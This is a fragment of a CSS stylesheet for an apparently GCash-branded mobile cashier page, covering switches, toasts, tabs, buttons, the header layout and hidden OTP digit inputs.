    top: 0;
    bottom: 0;
    right: 0;
    left: 0;
    transition: .3s;
    transition-property: left, transform;
    background-color: rgba(65, 170, 239, .3);
    transform: scale(1)
}

.ap-switcher:after {
    width: .52rem;
    height: .52rem;
    left: .04rem;
    top: .04rem;
    transform: translateZ(0);
    transition: transform .3s cubic-bezier(.32, .86, .62, 1.14);
    background: #fff;
    box-shadow: 0 3px 1px -2px rgba(0, 0, 0, .14), 0 2px 2px 0 rgba(0, 0, 0, .098), 0 1px 5px 0 rgba(0, 0, 0, .084)
}

.ap-switcher:checked {
    border-color: #41aaef;
    background: #41aaef
}

.ap-switcher:checked:before {
    left: .5rem;
    transform: scale(0)
}

.ap-switcher:checked:after {
    transform: translate3d(.4rem, 0, 0)
}

.ap-toast {
    position: fixed;
    width: 100%;
    top: 38%;
    top: 38vh;
    left: 0;
    right: 0;
    z-index: 3;
    text-align: center;
    transform: translateY(-50%)
}

.ap-toast>div {
    display: inline-block;
    min-width: 2.5rem;
    max-width: 70%;
    padding: .42rem .4rem;
    border-radius: .1rem;
    background: rgba(58, 58, 58, .9);
    color: #fff;
    font-size: .26rem
}

.ap-toast p {
    line-height: 1.3;
    margin: 0
}

.ap-toast .ap-icon {
    font-size: .72rem
}

.ap-toast .ap-icon-spin {
    width: .8rem;
    height: .8rem
}

.ap-toast .ap-icon+p {
    padding-top: .2rem
}

.ap-toast .ap-spin+p {
    padding-top: .1rem
}

.ap-toast-spin-bg {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: transparent
}

.ap-tabs {
    background: #fafafa
}

.ap-tabs ul {
    display: -ms-flexbox;
    display: flex;
    list-style: none;
    -ms-flex-pack: distribute;
    justify-content: space-around;
    padding: 0
}

.ap-tabs li {
    line-height: .88rem;
    color: #a4aab3;
    -ms-flex-positive: 1;
    flex-grow: 1;
    text-align: center;
    font-size: 0;
    border-bottom: 2px solid #fafafa;
    width: 50%
}

.ap-tabs li.ap--active {
    color: #0f7efe;
    border-bottom: 2px solid #0f7efe
}

.ap-tabs li span {
    display: inline-block;
    font-size: .34rem;
    vertical-align: middle
}

a {
    color: #00bff7
}

input::-webkit-inner-spin-button,
input::-webkit-outer-spin-button {
    -webkit-appearance: none;
    appearance: none;
    margin: 0
}

input[type=number] {
    -webkit-appearance: textfield;
    appearance: textfield
}

.mobile {
    min-height: 100vh
}

.mobile .cashier {
    background: #fff
}

.mobile .default-font {
    color: #58595b;
    font-size: .3rem
}

.mobile .text-irish-blue {
    color: #47afe2
}

.mobile .gcash-tittle {
    color: #111244;
    font-size: .6rem;
    font-weight: bolder
}

.submit-button :hover {
    cursor: pointer
}

.submit-button .ap-button-primary {
    background-color: #005add
}

.submit-button .ap-button-primary:disabled {
    opacity: .4 !important
}

.submit-button .ap-button {
    max-width: 90%;
    width: 5.92rem;
    height: .88rem;
    line-height: .88rem;
    border-radius: .5rem
}

.layout-header {
    background: #0057e4;
    color: #fff;
    margin: 0;
    text-align: center;
    font-size: .4rem;
    height: 3rem;
    padding-top: 1px;
    margin-bottom: -1.5rem
}

.layout-header img {
    display: block;
    margin: .5rem auto;
    width: 2.5rem
}

.layout-content {
    margin: 0 .32rem;
    background: #fff;
    box-shadow: 0 0 5px rgba(0, 0, 0, .5);
    border-radius: .15rem;
    overflow: hidden
}

.layout-content.full-content {
    box-shadow: none;
    border-radius: none;
    margin: 0
}

.main-container {
    padding-bottom: .2rem
}

.main-container footer p {
    padding-top: .24rem;
    text-align: center
}

.desktop .main-container {
    height: auto;
    padding-bottom: .5rem
}

.desktop .layout-header {
    height: 4.5rem;
    line-height: 2.6rem;
    font-size: .8rem;
    margin-bottom: -2.4rem
}

.desktop .layout-header img {
    margin: .74rem auto;
    width: 2.44rem
}

.desktop .layout-content {
    margin: 0 auto;
    width: 9rem
}

.page-container h2 {
    padding: .52rem .3rem 0;
    font-size: .32rem;
    font-weight: 700;
    text-align: center;
    color: #000
}

.error-text {
    color: #ff675c
}

.registration-footer {
    text-align: center;
    font-size: .25rem;
    margin-top: 1em
}

.registration-footer span {
    color: #005add;
    text-decoration: underline;
    font-weight: 700
}

.digit {
    width: 40px;
    font-size: 24px;
    text-align: center;
}

.otp-input {
    opacity: 0;
    /* 隐藏输入框 */
    caret-color: transparent; /* 隐藏光标 */
    position: fixed;
}
</style>